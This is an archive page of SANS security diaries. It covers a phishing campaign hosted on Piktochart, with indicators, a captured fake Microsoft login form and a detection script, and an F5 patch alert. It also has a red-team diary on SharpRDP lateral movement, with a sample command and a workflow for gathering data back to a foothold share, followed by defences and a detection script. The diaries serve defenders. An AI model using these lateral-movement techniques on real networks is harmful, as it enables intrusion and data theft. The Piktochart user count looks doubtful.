Archive for March 10th, 2021

Piktochart – Phishing with Infographics, (Thu, Mar 11th)

[This is a guest diary submitted by JB Bowers]

In line with our recent diaries featuring unusual attack vectors for credential theft, such as phishing over LinkedIn Mail [1] and a fake Outlook version update [2], we have recently learned of a phishing campaign targeting users of the infographic service Piktochart.

During the COVID-19 pandemic, nearly every kind of organization has moved to more online collaboration tools. This means that many small businesses, universities, primary and secondary schools, and others whose staff may not be well trained in online safety are especially exposed to this type of attack, particularly when the lure arrives through a relatively new tool like Piktochart.

I had not used Piktochart before, but this week security researcher @pageinsec [3] shared with me an infographic that asks the user to click on a link in order to read a shared PDF document [4].

According to its website, Piktochart has about 2,000 registered users and about 24 million piktocharts created, and it is used by companies such as Forbes and TechCrunch. With a legitimate business purpose endorsed by large companies, its domains are unlikely to be blocked by DNS filtering or other simple defenses against credential-stealing links, which makes the service an effective hosting point for attackers.

Piktochart has a feature that makes it even better suited to phishing: registered "Pro" users can download the infographic as an actual PDF file, with the malicious link intact, or render it to several sizes of PNG image. Those rendered image versions are listed in the IOCs near the bottom of this page and may be useful for hunting similar activity.

An unsuspecting victim receives an e-mail or social media post containing the malicious Piktochart from someone they know, whose account has already been compromised. If they click the link, a second-stage credential stealer follows: a fairly convincing (but fake) Microsoft login page hosted at the domain obggladdenlightfoundation(.)org. At the time of writing this base domain has "0 out of 87" vendors reporting it as malicious on VirusTotal, and it is made out to be a non-profit in Lagos, Nigeria. This specific example had a different site registration than most of the other, identical sites I have researched, so it is possible this site is the result of a takeover of a legitimate business's WordPress website, or a redirection of the site's DNS.

Despite its technical simplicity this is a dangerous campaign, since it is after Microsoft O365 credentials, and evidence points to the same IP being used for a large variety of credential theft sites. There are quite a few domains on the same IP [5], for example:

secure-official-spotify.pwanplus(.)com – this one serves a nice-looking DHL form [6]

Indicators of compromise (IOCs)

URLs/domains (block if not needed for business)

Second stage / credential stealer

IP address: [7]

Domain registrar: 007NAMES INC. (used for most of the domains)

Microsoft credential-stealer image, SHA-2 hashes (7, 10 and 3 KB versions of the same image)

DOM (credential-stealer page)

POST request form:
<form id="f2" method="post" action="#" style="margin-bottom: 0px;"> <input required="" type="email" placeholder="Email, phone, or Skype" name="e"
    style="outline:none; background-color:transparent;border:0px solid;height:30px;width:300px;font-weight:lighter;font-size:15px;margin-left:5px;padding-bottom:0px;padding-top:0px;"> <img

Cookies (expiry recorded as 1969-12-31 23:59:59): PHPSESSID, ip11
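The captured form above carries two tells that are easy to check automatically: the e-mail field reuses the placeholder text of the genuine Microsoft sign-in page, and the form POSTs to "#", i.e. back to the phishing host rather than to Microsoft. The following is an added example (not code from the diary or from Piktochart) that scans a fetched page for exactly those tells; the sample form is constructed from the DOM fragment quoted in the IOCs, the allow-list of Microsoft login hosts is mine, and the page host used in the usage call is a placeholder.

```python
"""Heuristic check for a cloned Microsoft sign-in form (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts that legitimately serve the Microsoft sign-in page (assumed allow-list).
MICROSOFT_LOGIN_HOSTS = {
    "login.microsoftonline.com",
    "login.live.com",
    "login.microsoft.com",
}

# Text copied verbatim from the genuine Microsoft sign-in form; the captured
# phishing DOM reuses it as the placeholder of its e-mail field.
BRAND_MARKERS = ("Email, phone, or Skype",)


class _FormScanner(HTMLParser):
    """Collect every <form> together with the <input> fields it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "type": (a.get("type") or "text").lower(),
                "placeholder": a.get("placeholder") or "",
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_login_clone(page_url, html):
    """Return the reasons `html` served from `page_url` looks like a cloned
    Microsoft sign-in form, or an empty list when nothing matches."""
    host = (urlsplit(page_url).hostname or "").lower()
    if host in MICROSOFT_LOGIN_HOSTS:
        return []  # the real sign-in page; nothing to flag

    scanner = _FormScanner()
    scanner.feed(html)
    reasons = []
    for form in scanner.forms:
        inputs = form["inputs"]
        branded = any(m in i["placeholder"] for i in inputs for m in BRAND_MARKERS)
        collects_creds = any(i["type"] in ("email", "password") for i in inputs)
        if not (branded and collects_creds):
            continue
        reasons.append(f"Microsoft sign-in placeholder text served from {host}")
        action_host = (urlsplit(form["action"]).hostname or "").lower()
        if form["method"] == "post" and action_host == "":
            # action="#" or a relative path: credentials go back to the phishing host
            reasons.append("credential form POSTs back to its own non-Microsoft origin")
        elif action_host and action_host not in MICROSOFT_LOGIN_HOSTS:
            reasons.append(f"credential form POSTs to third-party host {action_host}")
    return reasons


# Constructed sample, modelled on the DOM fragment quoted in the IOCs above
# (the captured fragment is cut off after the e-mail field; the submit button is assumed).
CAPTURED_FORM = """
<form id="f2" method="post" action="#" style="margin-bottom: 0px;">
  <input required="" type="email" placeholder="Email, phone, or Skype" name="e">
  <input type="submit" value="Next">
</form>
"""

if __name__ == "__main__":
    # "phishing-host.example" stands in for the real hosting domain.
    for reason in find_login_clone("https://phishing-host.example/login/", CAPTURED_FORM):
        print("FLAG:", reason)
```

A placeholder string is a crude brand marker and will need maintenance as Microsoft's page changes, but it is exactly the kind of verbatim copy that phishing kits leave behind, and pairing it with the "where do the credentials go" check keeps the false-positive rate low on intranet pages that merely collect an e-mail address.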

 JB Bowers

[1] –
[2] –
[3] –
[4] –
[5] –
[6] –
[7] –


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


If you have an F5, it's time to patch! Thanks Michele for the link to today's crop of F5 CVEs, which include an unauthenticated RCE against the API and another RCE against "hidden" config pages!, (Wed, Mar 10th)

Rob VandenBrink


SharpRDP – PSExec without PSExec, PSRemoting without PowerShell, (Wed, Mar 10th)

With the amount of detection tooling folks have these days to catch malicious execution of PowerShell or the use of tools like PsExec, red teams have to ask themselves: what approach is next for lateral movement after you get that first foothold?

For me, if the easy stuff isn't an option, SharpRDP makes a pretty easy "next tool on the shelf".

SharpRDP takes advantage of the fact that Microsoft borrowed heavily from the Citrix ICA protocol when they put RDP together. RDP isn't just for remote desktops: it implements "channels" that can be used for all sorts of things. Historically, the most common use of channels in ICA was to separate printer traffic from interactive traffic and apply different QoS policies to each. SharpRDP takes this to the next level: it lets you start a session and instruct it to execute a command once the session is up. (In practice SharpRDP drives the Microsoft Terminal Services ActiveX client, mstscax.dll, from C# and types the command into the freshly started session rather than opening a custom virtual channel; the write-up linked at the end of this diary covers the mechanics.)

For the red team this has oodles of attraction: often you don't have a GUI, and this lets you run pretty much anything you want on a remote host over a traditionally "GUI" protocol. Since it's in an RDP session, it's an actual terminal session (not a shell), so all of your inputs and outputs are handled correctly. While you could theoretically run a CLI terminal session over this, I'm not sure that this is implemented; I haven't needed to figure that piece out yet, if it is.

For someone on the blue team this is a tough thing to catch: it's going to look like any other RDP session that your admins might make, executing "something" after it starts. The tells are timing and session length rather than the protocol itself: a RemoteInteractive logon (Security event 4624, logon type 10) followed within seconds by a process creation (event 4688) in that same logon session, and a session that disconnects as soon as the command has been launched.

What does a session look like? It's as simple as:

>SharpRDP.exe computername=targetservername command="" username= password=
[+] Connected to          :  targetservername
[+] Execution priv type   :  non-elevated
[+] Executing
[+] Disconnecting from    :  targetservername
[+] Connection closed     :  targetservername

Normally I'll have the "command" be a CMD file that does whatever I'm trying to accomplish; usually it's data collection of some kind, with the data coming back to the host I have my foothold on. Remember that if your command is not an actual executable (for instance, "dir" is not an executable file, it's built into cmd.exe), you will have to use "c:\windows\system32\cmd.exe /c" to load the command interpreter before executing your "thing".

My go-to is single-letter CMD files, for instance t.cmd. This file is usually homed on my foothold server and sends the data back to a share on that same server. The output filename normally includes %COMPUTERNAME% so I can keep the files straight (and avoid name collisions).

Protections? LAPS is a good one: if every target host has a different local administrator password, you'll have to collect all of those first before you can use SharpRDP. (Note that LAPS only randomizes the local administrator password; an attacker holding domain credentials that are allowed to RDP to the target is not slowed down by it.) Really, though, if an attacker is far enough in to fire up RDP sessions to arbitrary hosts, harvesting the LAPS passwords isn't too tough once you figure out that LAPS is in play. MFA on RDP sessions is really your best bet. I've got a few clients running this, and it's pretty slick. Most MFA solutions allow you to extend RDP authentication; usually it's a "click OK" or a biometric confirmation (Face ID, usually) on your phone to complete the RDP session.

If you've got MFA on your servers for RDP access, then SharpRDP use is defeated nicely, and the detection you can code into your SIEM is whatever event is generated by "failed MFA on RDP". Your next-level protection in that case is "alert on any new registration of MFA users". You'll want any registration of new users, or of new phones for existing users, to go to a number of people: once MFA is a main protection, it also of course becomes a main target.

All that being said, MFA on RDP is not widely implemented in March of 2021, though a lot of people are working on fixing this. The uptick in migrating VPNs and Citrix Gateways to newer MFA solutions means that it's becoming much easier to extend MFA to more and more platforms, and RDP is one of the easier and more impactful ones we see picked.
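Where MFA is not yet in place, the blue-team angle earlier in this diary (an RDP session that executes something right after it starts) can still be hunted from the Windows Security log. The following is an added example, not code from this diary or from the SharpRDP project: it correlates RemoteInteractive logons (4624, logon type 10) with process creations (4688) in the same logon session and reports anything launched within a configurable window of the logon, plus the session length when a logoff (4634) was seen. It requires process creation auditing to be enabled (and the "include command line" policy if you want the CommandLine field). The event records are a constructed, simplified rendering of those events; the 30-second threshold and the assumption that a SharpRDP-launched command shows up with explorer.exe as its parent are mine.

```python
"""Hunt for RDP sessions that launch a process right after logon (added example)."""
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10                    # 4624 LogonType 10 = RemoteInteractive (RDP)
EXEC_WINDOW = timedelta(seconds=30)    # assumption: what counts as "right after logon"


def _ts(s):
    return datetime.fromisoformat(s)


def find_scripted_rdp_sessions(events, window=EXEC_WINDOW):
    """Return one finding per process created inside an RDP logon session within
    `window` of that logon. Events are dicts keyed by Security-log field names."""
    logons, logoffs = {}, {}
    for ev in events:
        if ev["EventID"] == 4624 and ev.get("LogonType") == RDP_LOGON_TYPE:
            logons[ev["TargetLogonId"]] = ev
        elif ev["EventID"] == 4634:
            logoffs[ev["TargetLogonId"]] = ev

    findings = []
    for ev in events:
        if ev["EventID"] != 4688:
            continue
        # 4688 carries the creating session as SubjectLogonId; match it to the 4624.
        logon = logons.get(ev["SubjectLogonId"])
        if logon is None:
            continue                   # not an RDP session we saw start
        delta = _ts(ev["Time"]) - _ts(logon["Time"])
        if not (timedelta(0) <= delta <= window):
            continue
        logoff = logoffs.get(ev["SubjectLogonId"])
        findings.append({
            "host": ev["Computer"],
            "user": logon["TargetUserName"],
            "source_ip": logon["IpAddress"],
            "seconds_after_logon": delta.total_seconds(),
            "process": ev["NewProcessName"],
            "parent": ev.get("ParentProcessName", ""),
            "command_line": ev.get("CommandLine", ""),
            # A session that ends seconds after the launch is the SharpRDP pattern
            # (connect, execute, disconnect); an admin session usually lives much longer.
            "session_seconds": (_ts(logoff["Time"]) - _ts(logon["Time"])).total_seconds()
            if logoff else None,
        })
    return findings


# Constructed sample events (hostnames, users, IPs and logon IDs are made up).
SAMPLE_EVENTS = [
    # Normal admin session: logs in, opens a console twelve minutes later.
    {"EventID": 4624, "Time": "2021-03-10T09:15:00", "Computer": "FS01", "LogonType": 10,
     "TargetUserName": "jsmith", "TargetLogonId": "0x3a1b2c", "IpAddress": "10.1.1.20"},
    {"EventID": 4688, "Time": "2021-03-10T09:27:40", "Computer": "FS01",
     "SubjectLogonId": "0x3a1b2c", "NewProcessName": "C:\\Windows\\System32\\mmc.exe",
     "ParentProcessName": "C:\\Windows\\explorer.exe"},
    # SharpRDP-style session: command four seconds after logon, session gone eight seconds later.
    {"EventID": 4624, "Time": "2021-03-10T14:02:11", "Computer": "FS01", "LogonType": 10,
     "TargetUserName": "svc-backup", "TargetLogonId": "0x5e9f01", "IpAddress": "10.1.1.77"},
    {"EventID": 4688, "Time": "2021-03-10T14:02:15", "Computer": "FS01",
     "SubjectLogonId": "0x5e9f01", "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe /c \\\\10.1.1.77\\share\\t.cmd"},
    {"EventID": 4634, "Time": "2021-03-10T14:02:23", "Computer": "FS01", "TargetLogonId": "0x5e9f01"},
    # Service process with no RDP logon in view: ignored.
    {"EventID": 4688, "Time": "2021-03-10T14:02:16", "Computer": "FS01",
     "SubjectLogonId": "0x3e7", "NewProcessName": "C:\\Windows\\System32\\svchost.exe"},
]

if __name__ == "__main__":
    for f in find_scripted_rdp_sessions(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['user']} from {f['source_ip']} ran {f['process']} "
              f"{f['seconds_after_logon']:.0f}s after RDP logon; session lasted {f['session_seconds']}s")
```

Expect noise from admins who log in and immediately launch a tool; the session length and the command line (a UNC path back to the source host, as in the collection workflow described above) are what separate a scripted session from a human one, so feed both into the alert rather than just the timing.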

SharpRDP is homed here:
And has a full write-up here:


Rob VandenBrink
